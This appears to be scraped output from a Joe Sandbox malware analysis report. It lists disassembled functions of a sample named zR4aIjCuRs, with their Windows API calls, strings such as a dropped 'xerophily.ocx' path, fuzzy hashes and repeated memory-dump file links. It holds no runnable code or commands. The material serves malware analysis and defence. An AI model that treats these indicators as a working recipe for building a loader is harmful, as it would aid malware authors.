Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0f39d9f12d53ff93ed05ad22e5c2654e25c024a76bc5e8eaad46146554dabe63
Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
Opcode Fuzzy Hash: 0f39d9f12d53ff93ed05ad22e5c2654e25c024a76bc5e8eaad46146554dabe63
Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18

Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\Desktop\xerophily.ocx,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\Desktop\xerophily.ocx,?,?,0040B5D0,000000FF,C:\Users\user\Desktop\xerophily.ocx,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\Desktop\xerophily.ocx, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\Desktop\xerophily.ocx
API String ID: 3109718747-1740715928
Opcode ID: 18a92599d19568ff8bc05a4b5855478ddca432145c4c7b47034acc93206d5566
Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
Opcode Fuzzy Hash: 18a92599d19568ff8bc05a4b5855478ddca432145c4c7b47034acc93206d5566
Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E

Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC

Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004052C5
CallWindowProcW.USER32(?,?,?,?), ref: 00405316

Part of subcall function 0040427D: SendMessageW.USER32(0002046A,00000000,00000000,00000000), ref: 0040428F

Strings

, xrefs: 004052A6

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E

Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Space available: ,?,?,004063FC,80000002), ref: 004061CE
RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Space available: ,Space available: ,Space available: ,00000000,Completed), ref: 004061D9

Strings

Space available: , xrefs: 0040618F

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CloseQueryValue
String ID: Space available:
API String ID: 3356406503-2890305591
Opcode ID: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
Opcode Fuzzy Hash: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4

Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,753B3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
GlobalFree.KERNEL32(00000000), ref: 00403936

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403927

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8

Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00442800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
CharPrevW.USER32(00442800,00000000,00442800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1

Strings

C:\Users\user\Desktop, xrefs: 00405BDB

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD

Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
